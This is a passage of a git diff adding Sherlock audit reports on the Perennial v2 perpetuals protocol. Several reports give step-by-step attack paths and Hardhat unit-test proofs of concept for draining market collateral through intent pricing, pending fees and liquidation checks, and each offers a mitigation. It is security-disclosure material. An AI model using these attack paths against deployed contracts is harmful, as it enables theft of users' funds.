the coordinator loses 10 shares + +### Impact + +The coordinator loses `profitShares` + +### PoC + +_No response_ + +### Mitigation + +Like `Market.sol#_credit()`, if `coordinator == context.account`, only change `context.local.shares` + +```diff +- function _credit(address account, UFixed6 shares) internal virtual { ++ function _credit(Context memory context, address account, UFixed6 shares) internal virtual { ++ if (account == context.account) context.local.shares = context.local.shares.add(shares) ++ else { + Account memory local = _accounts[account].read(); + local.shares = local.shares.add(shares); + _accounts[account].store(local); ++ } + } +``` \ No newline at end of file diff --git a/025.md b/025.md new file mode 100644 index 0000000..b62cbe7 --- /dev/null +++ b/025.md @@ -0,0 +1,39 @@ +Shambolic Mint Dinosaur + +High + +# Oracle Data Validation Gaps + +### Summary + +The Market.sol contract does not validate the oracle's timestamp freshness. If the oracle returns stale data, positions may settle at outdated prices. + +### Root Cause + +In https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L503 the contract does not validate the oracle's timestamp freshness. It might therefore use outdated/stale prices in operations. + +### Internal Pre-conditions + +_No response_ + +### External Pre-conditions + +_No response_ + +### Attack Path + +_No response_ + +### Impact + +Oracles periodically push price data on-chain. If the smart contract does not validate the timestamp of the oracle's latest update, it might use outdated (stale) prices for operations, leading to: +1. Inaccurate Operations: Stale prices might not reflect the current market conditions, leading to incorrect collateralization ratios, trade executions, or liquidation thresholds. +2. Economic Losses: Users may lose funds due to improper liquidations or overpayment for swaps caused by stale prices. 
+ +### PoC + +_No response_ + +### Mitigation + +Add checks for oracleVersion.timestamp against a MAX_DELAY. \ No newline at end of file diff --git a/026.md b/026.md new file mode 100644 index 0000000..bc1691a --- /dev/null +++ b/026.md @@ -0,0 +1,39 @@ +Shambolic Mint Dinosaur + +High + +# ERC20 Decimal Handling Risk + +### Summary + +The claimFee function uses UFixed6Lib and UFixed18Lib for token amounts, assuming consistent decimal handling. + +### Root Cause + +In https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L360 the claimFee function uses UFixed6Lib and UFixed18Lib for token amounts, assuming consistent decimal handling. +In https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L390 +For tokens with decimals ≠ 18 (e.g., USDC with 6 decimals), conversions like UFixed18Lib.from(feeReceived) may miscalculate values. + +### Internal Pre-conditions + +_No response_ + +### External Pre-conditions + +_No response_ + +### Attack Path + +_No response_ + +### Impact + +Token transfers may fail or lose precision for non-18 decimal tokens. + +### PoC + +_No response_ + +### Mitigation + +Use library methods that explicitly account for token decimals during conversions. \ No newline at end of file diff --git a/027.md b/027.md new file mode 100644 index 0000000..ab7344b --- /dev/null +++ b/027.md @@ -0,0 +1,97 @@ +Fun Pear Mantis + +Medium + +# Inconsistent EIP-712 type hash definition for Fixed6 amount in `Take.sol` and `RelayedTake.sol` will lead to signature verification failures due to nested struct propagation + +### Summary + +Inconsistent type hash definition where Fixed6 amount is defined as int256 in the STRUCT_HASH will cause signature verification failures for users, as the nested struct propagation in RelayedTake compounds the EIP-712 type hash mismatch from the base Take contract. 
+ + + +### Root Cause + +In `Take.sol`, the STRUCT_HASH defines the amount field as `int256` while the actual struct uses `Fixed6`. This type mismatch is then propagated into `RelayedTake.sol` STRUCT_HASH through its nested Take struct definition: + +Take.sol: + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/types/Take.sol#L9C1-L22C2 + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/types/Take.sol#L28C1-L29C10 + +```solidity +struct Take { + Fixed6 amount; // Uses Fixed6 + address referrer; + Common common; +} + +bytes32 constant public STRUCT_HASH = keccak256( + "Take(int256 amount,address referrer,Common common)" // Defines as int256 + ... +); +``` + +RelayedTake.sol: + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/periphery/contracts/CollateralAccounts/types/RelayedTake.sol#L8C1-L15C2 + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/periphery/contracts/CollateralAccounts/types/RelayedTake.sol#L20C1-L25C7 + +```solidity +struct RelayedTake { + Take take; // Embeds Take struct + Action action; +} + +bytes32 constant public STRUCT_HASH = keccak256( + "RelayedTake(Take take,Action action)" + ... + "Take(int256 amount,address referrer,Common common)" // Propagates incorrect type +); +``` + + +### Internal Pre-conditions + +1. User creates a signed Take message with a Fixed6 amount value +2. The message is processed through either: + - Take contract directly, or + - RelayedTake contract which nests the Take struct + + +### External Pre-conditions + +Not applicable. The vulnerability stems purely from the internal type mismatch between Fixed6 and int256 in the EIP-712 type hash definitions, and how this mismatch propagates through the nested struct implementation between `Take.sol` and `RelayedTake.sol`. + +### Attack Path + +1. 
User creates a Take with a Fixed6 amount +2. The Fixed6 amount is internally scaled by 1e6 (BASE) as defined in Fixed6Lib +3. When hashing for signature verification: + - In Take: The struct uses Fixed6 (scaled) but STRUCT_HASH expects int256 (unscaled) + - In RelayedTake: The nested Take struct inherits this mismatch, propagating it to the top-level signature verification +4. Signature verification fails in both cases due to type mismatch and value scaling inconsistency + +### Impact + + +Users cannot execute signed Take operations as signature verifications will fail due to the type mismatch between Fixed6 and int256 in the EIP-712 domain separator. This impact is compounded because: + +1. The issue exists in both: + - Base Take contract (direct impact) + - RelayedTake contract (propagated impact through nested struct) +2. All signed messages involving amounts will fail verification regardless of entry point +3. This breaks the intended permissionless nature of the protocol for signed operations +4. The nested struct relationship means fixing the issue requires coordinated updates to maintain consistency across both contracts + +The architectural choice to nest the Take struct in `RelayedTake.sol` while maintaining inconsistent type definitions amplifies the impact of this vulnerability across the protocol's signature verification system. + +### PoC + +_No response_ + +### Mitigation + +_No response_ \ No newline at end of file diff --git a/028.md b/028.md new file mode 100644 index 0000000..966e133 --- /dev/null +++ b/028.md @@ -0,0 +1,167 @@ +Clumsy Pink Otter + +High + +# Anyone can steal all funds from the `market` due to incorrect health accounting for pending pnl from difference of intent price and market price when multiple intents are used. + +### Summary + +When user opens position from signed intent, pending orders are created for 2 accounts (intent taker and maker) with user-specified price. 
Upon settlement, there is some pnl realized to both accounts due to difference of intent price and market price. The intent price is specified by the user and can be any number within the limits set by the protocols off the latest commited price. The issue is that this pnl is accounted for in account health only for one (current) intent. If there are multiple intents pending for the same account, then all the other intents are ignored and thus attacker can send multiple intents, each of which keeps account healthy, but all of them combined put account into highly negative collateral, which is ignored by health check. This allows attacker to withdraw inflated profit from the other account, stealing all funds from the `market`. + +### Root Cause + +When account health is checked, collateral is adjusted for only current intent (`newGuarantee`) in `InvariantLib.validate`: +https://github.com/sherlock-audit/2024-08-perennial-v2-update-3-panprog/blob/ac46a2fc8baf6c827ee20c69eecae66561a5c65f/perennial-v2/packages/perennial/contracts/types/Guarantee.sol#L71 + +All the other intents (at this, or previous pending orders) are ignored. + +### Internal Pre-conditions + +None. + +### External Pre-conditions + +None. + +### Attack Path + +Since intents can be easily created by any user, there are no pre-conditions for the attack. The scenario is as following: +- Attacker deposits some collateral into `account1` and `account2` (for example, `40`) +- Attacker signs intent with some position (like long `1`) and a price which is much higher than latest oracle price, but inside the protocol's max price deviation limit (say, of `120` when current price is `100`) from `account1` +- Attacker uses `account2` to calls `market.update` with the signed intent from `account1`. This is accepted, as `account1` collateral when checking update invariant is `40 + 1 * (100 - 120) = 40 - 20 = 20` +- The same intent is signed again from `account1` and `account2` submits it again. 
This is accepted again, as `account1` collateral when checking update invariant is again `40 + 1 * (100 - 120) = 40 - 20 = 20` (it only accounts the 2nd intent, ignoring the 1st intent). However, if this is settled (both intents), the collateral will be `40 + 2 * (100 - 120) = 40 - 40 = 0`. +- The same intent is signed again from `account1` and `account2` submits it again. This is accepted again, as `account1` collateral when checking update invariant is again `40 + 1 * (100 - 120) = 40 - 20 = 20` (it only accounts the 3rd intent, ignoring the 1st and the 2nd intents). However, if this is settled (all 3 intents), the collateral will be `40 + 3 * (100 - 120) = 40 - 60 = -20`. +- This is repeated as many times as necessary (everything in the same epoch, so that all intents are not settled) +- After the settlement, sum of all intents causes `account1` to be in highly negative collateral, while `account2` will be in the same profit. +- Attacker withdraws all funds which `market` has. + +### Impact + +All market collateral token balance is stolen. 
+ +### PoC + +Add to `test/unit/Market.test.ts` in the `invariant violations` context: +```solidity + it('multiple intents ignore pnl from the other intents price adjustments', async () => { + const marketParameter = { ...(await market.parameter()) } + marketParameter.maxPriceDeviation = parse6decimal('10.00') + await market.updateParameter(marketParameter) + + const intent = { + amount: parse6decimal('0.3'), + price: parse6decimal('1250'), + fee: parse6decimal('0.5'), + originator: liquidator.address, + solver: owner.address, + collateralization: parse6decimal('0.01'), + common: { + account: user.address, + signer: user.address, + domain: market.address, + nonce: 0, + group: 0, + expiry: 0, + }, + } + + const intent2 = { + amount: parse6decimal('0.3'), + price: parse6decimal('1250'), + fee: parse6decimal('0.5'), + originator: liquidator.address, + solver: owner.address, + collateralization: parse6decimal('0.01'), + common: { + account: user.address, + signer: user.address, + domain: market.address, + nonce: 1, + group: 0, + expiry: 0, + }, + } + + const LOWER_COLLATERAL = parse6decimal('500') + + dsu.transferFrom.whenCalledWith(user.address, market.address, LOWER_COLLATERAL.mul(1e12)).returns(true) + dsu.transferFrom.whenCalledWith(userB.address, market.address, LOWER_COLLATERAL.mul(1e12)).returns(true) + dsu.transferFrom.whenCalledWith(userC.address, market.address, LOWER_COLLATERAL.mul(1e12)).returns(true) + + await market + .connect(userB) + ['update(address,uint256,uint256,uint256,int256,bool)']( + userB.address, + POSITION, + 0, + 0, + LOWER_COLLATERAL, + false, + ) + + await market + .connect(user) + ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, 0, 0, 0, LOWER_COLLATERAL, false) + await market + .connect(userC) + ['update(address,uint256,uint256,uint256,int256,bool)'](userC.address, 0, 0, 0, LOWER_COLLATERAL, false) + + oracle.at.whenCalledWith(ORACLE_VERSION_2.timestamp).returns([ORACLE_VERSION_2, INITIALIZED_ORACLE_RECEIPT]) + 
oracle.at.whenCalledWith(ORACLE_VERSION_3.timestamp).returns([ORACLE_VERSION_3, INITIALIZED_ORACLE_RECEIPT]) + oracle.at.whenCalledWith(ORACLE_VERSION_4.timestamp).returns([ORACLE_VERSION_4, INITIALIZED_ORACLE_RECEIPT]) + oracle.status.returns([ORACLE_VERSION_2, ORACLE_VERSION_3.timestamp]) + + verifier.verifyIntent.returns() + + // solver + factory.authorization + .whenCalledWith(userC.address, userC.address, userC.address, constants.AddressZero) + .returns([true, true, BigNumber.from(0)]) + // taker + factory.authorization + .whenCalledWith(user.address, userC.address, user.address, liquidator.address) + .returns([false, true, parse6decimal('0.20')]) + + await market + .connect(userC) + [ + 'update(address,(int256,int256,uint256,address,address,uint256,(address,address,address,uint256,uint256,uint256)),bytes)' + ](userC.address, intent, DEFAULT_SIGNATURE); + + await market + .connect(userC) + [ + 'update(address,(int256,int256,uint256,address,address,uint256,(address,address,address,uint256,uint256,uint256)),bytes)' + ](userC.address, intent2, DEFAULT_SIGNATURE); + + oracle.status.returns([ORACLE_VERSION_3, ORACLE_VERSION_4.timestamp]) + + await settle(market, user) + await settle(market, userB) + await settle(market, userC) + + var loc = await market.locals(user.address); + console.log("user collateral: " + loc.collateral); + var pos = await market.positions(user.address); + console.log("user pos: long = " + pos.long); + + var loc = await market.locals(userC.address); + console.log("userC collateral: " + loc.collateral); + var pos = await market.positions(userC.address); + console.log("userC pos: short = " + pos.short); + }) +``` + +Console output: +```solidity +user collateral: -176200000 +user pos: long = 600000 +userC collateral: 1176200000 +userC pos: short = 600000 +``` + +Notice that final userC's collateral is higher than sum of collateral of both users at the start, meaning that attacker has stolen these funds from the market. 
+ +### Mitigation + +Calculate sum of price adjustments for all pending guarantees (from latest + 1 to current), and add it to collateral when validating margined requirement. \ No newline at end of file diff --git a/029.md b/029.md new file mode 100644 index 0000000..ec8c4ba --- /dev/null +++ b/029.md @@ -0,0 +1,54 @@ +Clumsy Pink Otter + +High + +# Some accounts using Intents to trade might be liquidated while healthy or be unliquidatable while being unhealthy. + +### Summary + +When user trades using signed intents, pending order is created using the price specified by the user. Upon settlement, there is some pnl realized due to difference of intent price and market price. The issue is that this difference is added to account only when checking margin to add pending order, but when protection (liquidation) is validated, collateral doesn't include pending intent's pnl from the difference of intent and market price. As such, user can be unfairly liquidated if price moves against him but he has enough collateral (with pnl from pending intent orders). If there is a loss from intent price difference, then this loss is not added when checking liquidation either, thus liquidation will revert as if account is healthy. 
+ +### Root Cause + +When protection is validated, only account's collateral is checked in `InvariantLib.validate`: +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/InvariantLib.sol#L127 + +Note that when position is opened, intent price adjustment is added to account's collateral: +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/InvariantLib.sol#L92 + +### Internal Pre-conditions + +- User account is close to liquidation +- Position is opened or closed via Intent with intent price far enough from the latest oracle price (far enough - meaning the difference in price can make account safe) +- Price moves against the user + +### External Pre-conditions + +None. + +### Attack Path + +Happens by itself (unfair user liquidation) or can be crafted by the user (avoid liquidation). +- Margin ratio is 0.5%, maintenence ratio is 0.3% +- Trading fee is 0.1% +- User has `collateral = 350` and settled position of `long = 1000` at the latest oracle price of `100` (account margin ratio is `350 / (1000 * 100) = 0.35%`, very close to liquidation, but still healthy) +- User signs intent to partially close position of the size `500` at the price of `101`. +- The intent is sent on-chain and user now has pending position of `long = 500`. His additional profit from the intent price is `500 * (101 - 100) = 500`. +- Liquidator commits unrequested price of `99.9` +- User's collateral is now `350 + 1000 * (99.9 - 100) = 250`, however since the intent is guaranteed to be executed at the price of `101`, his additional profit from the intent makes the expected margin ratio for liquidation reason = `(250 + 500) / (1000 * 100) = 0.75%`, so account should be safe. +- However, liquidator immediately liquidates user account, because this additional profit from the intent is ignored. 
+- Besides liquidation fee, upon settlement, user pays fees to close the position from liquidation, which is `500 * 100 * 0.1% = 50`, so the final user collateral is 700 instead of 750. +- User was unfairly liquidated (as his account was healthy) and user has lost `50 / 750 = 6.7%` of his funds. + +### Impact + +- User can be unfairly and unexpectedly liquidated and lose 1%+ of his funds (because this happens only to users with low collateral and the pnl from intent price difference will mostly be small enough, the user loss relative to collateral will be above 1%). + +### Mitigation + +Calculate sum of price adjustments for all pending guarantees (from latest + 1 to current), and add it to collateral when validating if account can be protected (liquidated). + +Additionally, since intent updates are guaranteed and can not be invalidated, consider adding intent position updates to latest position when calculating the account health for liquidation reasons to make more fair liquidations. For example, when position is closed using intent (as in the example in the Attack Path): +- latest = 1000 +- pending (intent) = -500 +Use position of size (1000 - 500 = 500) to calculate health when liquidating, so min collateral should be below 150 instead of 300 to be able to liquidate the account. \ No newline at end of file diff --git a/030.md b/030.md new file mode 100644 index 0000000..e98c98f --- /dev/null +++ b/030.md @@ -0,0 +1,159 @@ +Clumsy Pink Otter + +High + +# `InvariantLib` uses current position for margin check allowing to withdraw collateral while the position decrease is only pending and can cause unexpected immediate user liquidation. 
+ +### Summary + +In normal `update`, the `InvariantLib.validate` uses the `currentPosition` for margin check: +```solidity + if ( + !PositionLib.margined( + updateContext.currentPositionLocal.magnitude(), + context.latestOracleVersion, + context.riskParameter, + updateContext.collateralization, + context.local.collateral.add(newGuarantee.priceAdjustment(context.latestOracleVersion.price)) // apply price override adjustment from intent if present + ) + ) revert IMarket.MarketInsufficientMarginError(); +``` + +However, during liquidation (`protected = true`), `latestPosition` is used for maintenence check: +```solidity + if (context.latestPositionLocal.maintained( + context.latestOracleVersion, + context.riskParameter, + context.local.collateral + )) return false; // latest position is properly maintained +``` + +The latest position is position at the last commited price, while current position is expected position when price is commited for the current epoch (latest + pending). These are 2 totally different values. Usage of `currentPosition` in margined check means that user is allowed to withdraw collateral based on "pending" position (which might still be invalidated). This is wrong by itself, but usage of `latestPosition` in liquidation maintenence check means that normal updates and liquidations are disconnected: perfectly fine normal `update` can easily cause unexpected immediate liquidation after the user withdraws collateral. 
+ +### Root Cause + +Incorrect usage of `currentPosition` in margined check in `InvariantLib.validate`: +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/InvariantLib.sol#L87-L93 + +Additionally, liquidation uses `latestPosition` in maintenence check: +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/InvariantLib.sol#L124-L128 + +### Internal pre-conditions + +- User reduces position and withdraws collateral, keeping healthy collateral for new (reduced) position. + +### External pre-conditions + +None. + +### Attack Path + +Happens by itself: +- User reduces position (e.g., from 10 to 5) and withdraws collateral, keeping enough to keep new reduced position healthy (e.g. withdrawing half of collateral). +- User account becomes immediately liquidatable and user is liquidated by any liquidator. +- Result: user is unfairly liquidated, losing liquidation and trading fees + +User crafts self-liquidation to steal liquidation fees (can be profitable depending on trading fees and liquidation fee): +- Attacker opens position from account1 +- Awaits settlement +- Attacker then closes full position from account1 and withdraws all collateral (allowed, since `currentPosition == 0`, so 0 collateral needed in margined check) +- Attacker immediately liquidates account1 from account2. +- Result: account1 is in bad debt, account2 earns liquidation fees. + +### Impact + +If user is unfairly liquidated: easily 1%+ funds loss from liquidation. For example: +- Margin ratio is 1.2%, maintenence ratio is 1% +- Trading fee is 0.3% +- Asset price = 1000 +- User has position size = 10, collateral = 200 (margin = 200 / (10*1000) = 2%) +- User reduces position size to 5 (fee = 5000*0.3% = 15), withdraws collateral = 95. Remaining collateral = 90. 
Margin = 95 / (5 * 1000) = 1.8% +- But the position is immediately liquidated (because maintenence for liquidation purpose = 95 / (10 * 1000) = 0.95%) +- User has position unfairly liquidated and loses fee of 15, so his loss is 15 / 90 = 17% + +If liquidation bonus for liquidator is higher than trading fees from the position, then attacker can repeatedly self-liquidate until all market funds are withdrawn via liquidation fees. + +### PoC + +Add to `test/unit/Market.test.ts` in the `invariant violations` context: +```solidity +it('reduced position with collateral withdrawal makes liquidatable position', async () => { + const riskParameter = { ...(await market.riskParameter()) } + const riskParameterTakerFee = { ...riskParameter.takerFee } + riskParameterTakerFee.linearFee = parse6decimal('0.003') + riskParameter.takerFee = riskParameterTakerFee + riskParameter.margin = parse6decimal('0.012') + riskParameter.maintenance = parse6decimal('0.01') + riskParameter.minMargin = parse6decimal('5') + riskParameter.minMaintenance = parse6decimal('5') + await market.updateRiskParameter(riskParameter) + + const COLLATERAL_USER = parse6decimal('30') + const POSITION_USER = parse6decimal('10') + const POSITION2_USER = parse6decimal('5') + const COLLATERAL2_USER = parse6decimal('15') + + dsu.transferFrom.whenCalledWith(user.address, market.address, COLLATERAL_USER.mul(1e12)).returns(true) + dsu.transferFrom.whenCalledWith(userB.address, market.address, COLLATERAL.mul(1e12)).returns(true) + dsu.transferFrom.whenCalledWith(userC.address, market.address, COLLATERAL_USER.mul(1e12)).returns(true) + + await market + .connect(userB) + ['update(address,uint256,uint256,uint256,int256,bool)']( + userB.address, + POSITION, + 0, + 0, + COLLATERAL, + false, + ) + + await market + .connect(user) + ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, 0, POSITION_USER, 0, COLLATERAL_USER, false) + + oracle.at.whenCalledWith(ORACLE_VERSION_2.timestamp).returns([ORACLE_VERSION_2, 
INITIALIZED_ORACLE_RECEIPT]) + oracle.at.whenCalledWith(ORACLE_VERSION_3.timestamp).returns([ORACLE_VERSION_3, INITIALIZED_ORACLE_RECEIPT]) + oracle.at.whenCalledWith(ORACLE_VERSION_4.timestamp).returns([ORACLE_VERSION_4, INITIALIZED_ORACLE_RECEIPT]) + oracle.status.returns([ORACLE_VERSION_2, ORACLE_VERSION_3.timestamp]) + + // position opened. now partially close position and withdraw collateral + dsu.transfer.whenCalledWith(user.address, COLLATERAL2_USER.mul(1e12)).returns(true) + await market + .connect(user) + ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, 0, POSITION2_USER, 0, -COLLATERAL2_USER, false) + + var loc = await market.locals(user.address); + console.log("user collateral before liquidation: " + loc.collateral); + + // user becomes immediately liquidatable + await market + .connect(userC) + ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, 0, 0, 0, 0, true) + + oracle.status.returns([ORACLE_VERSION_3, ORACLE_VERSION_4.timestamp]) + + await settle(market, user) + await settle(market, userB) + await settle(market, userC) + + var loc = await market.locals(user.address); + console.log("user collateral: " + loc.collateral); + var pos = await market.positions(user.address); + console.log("user pos: long = " + pos.long); +}) +``` + +Console output: +```solidity +user collateral before liquidation: 11310000 +user collateral: 7472950 +user pos: long = 0 +``` + +Demonstrates the user who reduced position from 10 to 5, is liquidated and his collateral reduces from 11.31 to 7.47 (actually, 11.31 doesn't include pending fees, so real collateral after fees is 9.31 before liquidation, 7.47 after unfair liquidation). + +### Mitigation + +1. Do not use currentPosition in margin check. Previously, the marin check had latestPosition + pending.maxPositive, which was correct. With the new system it might make sense to add pending.maxPositive if pending.invalidation == 1, or currentPosition if pending.invalidation == 0 +2. 
Make sure that the liquidation maintenance check matches the normal update margin check, so use the same position size for the check. diff --git a/031.md b/031.md new file mode 100644 index 0000000..11f7de6 --- /dev/null +++ b/031.md @@ -0,0 +1,201 @@ +Clumsy Pink Otter + +High + +# Intent orders are guaranteed to execute, but fees from these orders are not accounted in collateral, allowing user to withdraw all collateral ignoring these pending fees. + +### Summary +In normal `update`, all orders are pending and might be invalidated if an invalid price is committed for the corresponding epoch (no pricefeed available or price commit timeout). However, when `Intent`s are used, these orders are guaranteed to be accepted (`invalidation = 0` for them). In particular, this feature allows opening and closing orders via `Intent`s even when the open order epoch is not committed yet. + +The issue is that the fees for the orders are pending and not included in collateral calculations. At the same time, since `Intent` orders are guaranteed, user can open them, close them and withdraw all collateral ignoring any pending fees. Then, after the price for the corresponding epoch is committed, the fees are added to user collateral (which is 0), thus user goes into bad debt. These fees taken are distributed to admin and part of them becomes claimable by the referrer. + +This means that an attacker can open, close, and withdraw all collateral at 0 cost, and after the epoch price is committed, the referrer (also controlled by the attacker) can claim part of the fees. Essentially, the attacker steals funds from the market via claiming fees which become bad debt of the abandoned account. 
+ +### Root Cause +Trade fees are only applied to account collateral when advancing checkpoints (which happens after the epoch price is commited): +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/CheckpointLib.sol#L84-L92 + +At the same time, when all pending orders are guaranteed (from Intents, `invalidation == 0`), user is allowed to fully close the position, even if the opening is still pending (pending negative - which is pending closure - can exceed latest commited position): +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/InvariantLib.sol#L35-L38 + +### Internal pre-conditions +None. + +### External pre-conditions +None. + +### Attack Path +1. Attacker funds account1 and account2 +2. Attacker uses account1 to create 2 Intents to open and then close position with account3 as originator and referral. +3. Attacker uses account2 to execute both intents (to open and then immediately close position) +4. Attacker withdraws all collateral from account1 and account2, getting the same amount he has deposited, because fees are still pending and ignored at this time. +Note: steps 1-4 can be done in 1 transaction, thus attacker can use flash loan to execute the attack +5. Attacker waits until the epoch price is commited +6. Attacker call `market.claimFee(account3)` to get referral fees from the orders. +Result: Attacker can steal all funds from the market. + +### Impact +All market funds are stolen by the Attacker. 
+ +### PoC +Add to `test/unit/Market.test.ts` in the `invariant violations` context: +```solidity +it('withdraw fees', async () => { + const riskParameter = { ...(await market.riskParameter()) } + riskParameter.margin = parse6decimal('0.012') + riskParameter.maintenance = parse6decimal('0.01') + riskParameter.minMargin = parse6decimal('5') + riskParameter.minMaintenance = parse6decimal('5') + await market.updateRiskParameter(riskParameter) + + const marketParameter = { ...(await market.parameter()) } + marketParameter.takerFee = parse6decimal('0.003') + await market.updateParameter(marketParameter) + + factory.parameter.returns({ + maxPendingIds: 5, + protocolFee: parse6decimal('0.50'), + maxFee: parse6decimal('0.01'), + maxLiquidationFee: parse6decimal('1000'), + maxCut: parse6decimal('0.50'), + maxRate: parse6decimal('10.00'), + minMaintenance: parse6decimal('0.01'), + minEfficiency: parse6decimal('0.1'), + referralFee: parse6decimal('0.20'), + minScale: parse6decimal('0.001'), + maxStaleAfter: 14400, + }) + + const intent = { + amount: parse6decimal('0.3'), + price: parse6decimal('123'), + fee: parse6decimal('0.5'), + originator: liquidator.address, + solver: liquidator.address, + collateralization: parse6decimal('0.01'), + common: { + account: user.address, + signer: user.address, + domain: market.address, + nonce: 0, + group: 0, + expiry: 0, + }, + } + + const intent2 = { + amount: -parse6decimal('0.3'), + price: parse6decimal('123'), + fee: parse6decimal('0.5'), + originator: liquidator.address, + solver: liquidator.address, + collateralization: parse6decimal('0.01'), + common: { + account: user.address, + signer: user.address, + domain: market.address, + nonce: 1, + group: 0, + expiry: 0, + }, + } + + const LOWER_COLLATERAL = parse6decimal('500') + + dsu.transferFrom.whenCalledWith(user.address, market.address, LOWER_COLLATERAL.mul(1e12)).returns(true) + dsu.transferFrom.whenCalledWith(userB.address, market.address, LOWER_COLLATERAL.mul(1e12)).returns(true) 
+ dsu.transferFrom.whenCalledWith(userC.address, market.address, LOWER_COLLATERAL.mul(1e12)).returns(true) + + await market + .connect(userB) + ['update(address,uint256,uint256,uint256,int256,bool)']( + userB.address, + POSITION, + 0, + 0, + LOWER_COLLATERAL, + false, + ) + + await market + .connect(user) + ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, 0, 0, 0, LOWER_COLLATERAL, false) + await market + .connect(userC) + ['update(address,uint256,uint256,uint256,int256,bool)'](userC.address, 0, 0, 0, LOWER_COLLATERAL, false) + + oracle.at.whenCalledWith(ORACLE_VERSION_2.timestamp).returns([ORACLE_VERSION_2, INITIALIZED_ORACLE_RECEIPT]) + oracle.at.whenCalledWith(ORACLE_VERSION_3.timestamp).returns([ORACLE_VERSION_3, INITIALIZED_ORACLE_RECEIPT]) + oracle.at.whenCalledWith(ORACLE_VERSION_4.timestamp).returns([ORACLE_VERSION_4, INITIALIZED_ORACLE_RECEIPT]) + oracle.status.returns([ORACLE_VERSION_2, ORACLE_VERSION_3.timestamp]) + + verifier.verifyIntent.returns() + + // solver + factory.authorization + .whenCalledWith(userC.address, userC.address, userC.address, constants.AddressZero) + .returns([true, true, BigNumber.from(0)]) + // taker + factory.authorization + .whenCalledWith(user.address, userC.address, user.address, liquidator.address) + .returns([false, true, parse6decimal('0.20')]) + + await market + .connect(userC) + [ + 'update(address,(int256,int256,uint256,address,address,uint256,(address,address,address,uint256,uint256,uint256)),bytes)' + ](userC.address, intent, DEFAULT_SIGNATURE); + + await market + .connect(userC) + [ + 'update(address,(int256,int256,uint256,address,address,uint256,(address,address,address,uint256,uint256,uint256)),bytes)' + ](userC.address, intent2, DEFAULT_SIGNATURE); + + const WITHDRAW_COLLATERAL = parse6decimal('500') + + dsu.transfer.whenCalledWith(user.address, WITHDRAW_COLLATERAL.mul(1e12)).returns(true) + + await market + .connect(user) + ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, 
0, 0, 0, -WITHDRAW_COLLATERAL, false) + + oracle.status.returns([ORACLE_VERSION_3, ORACLE_VERSION_4.timestamp]) + + await settle(market, user) + await settle(market, userB) + await settle(market, userC) + + var loc = await market.locals(user.address); + console.log("user collateral: " + loc.collateral); + var pos = await market.positions(user.address); + console.log("user pos: long = " + pos.long); + + var loc = await market.locals(userC.address); + console.log("userC collateral: " + loc.collateral); + var pos = await market.positions(userC.address); + console.log("userC pos: short = " + pos.short); + + var loc = await market.locals(userB.address); + console.log("userB collateral: " + loc.collateral); + + var loc = await market.locals(liquidator.address); + console.log("liquidator claimable: " + loc.claimable); + +}) +``` + +Console output: +```solidity +user collateral: -221400 +user pos: long = 0 +userC collateral: 500000000 +userC pos: short = 0 +userB collateral: 500000000 +liquidator claimable: 44280 +``` + +Demonstrates how Attacker can use 3 accounts to generate claimable fees for free, creating abandoned bad debt account in the process. + +### Mitigation +The issue comes from the fact that position change is guaranteed for Intent orders, but fees are pending until price is commited and are not included in margin/maintenence check calculations. Possible mitigation is to subtract fees pending from the Intent orders (Guarantee) from the collateral in `InvariantLib` when doing margin/maintenence check. \ No newline at end of file diff --git a/032.md b/032.md new file mode 100644 index 0000000..2589544 --- /dev/null +++ b/032.md @@ -0,0 +1,131 @@ +Clumsy Pink Otter + +High + +# When account is liquidated (protected), liquidator can increase account's position to any value up to `2**62 - 1` breaking all market accounting and stealing all market funds. + +### Summary + +Previously, there was a check which enforced position to only decrease during liquidation. 
However, the check is gone and in the current code only the condition of `pending.negative == latestPosition.magnitude`: +```solidity + if (!context.pendingLocal.neg().eq(context.latestPositionLocal.magnitude())) return false; // no pending zero-cross, liquidate with full close +``` + +If account (before liquidation) is already in this state (for example, user has closed his position fully, but it's still pending - in this case `pendingLocal.neg()` will equal `latestPositionLocal.magnitude()` before the liquidation), then liquidator can increase position, and since it doesn't influence neither latest position nor pending negative (closing), it's allowed. Moreover, all collateral and position size checks are ignored during liquidation, so account position can be increased to any value, including max that can be stored: 2**62 - 1. If this is done, all market accounting is messed up as any slight price change will create huge profit or loss for makers and the liquidated account. This can be abused by attacker to steal all market funds. + +### Root Cause + +Incorrect check when liquidating the account (lack of enforcement to only reduce the position): +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/InvariantLib.sol#L121 + +### Internal pre-conditions + +None. + +### External pre-conditions + +None. + +### Attack Path + +1. Attacker opens tiny long position from account1 with minimal collateral, and tiny maker position from account2. +2. Attacker awaits for the position to become liquidatable. He can also force liquidation himself, as described in another issue (close position and withdraw collateral, then position becomes liquidatable), but this is not necessary, just makes it easier. +3. Just before the position becomes liquidatable, attacker closes it fully (so that it's pending close), making `pending.negative == latestPosition.magnitude` +4. 
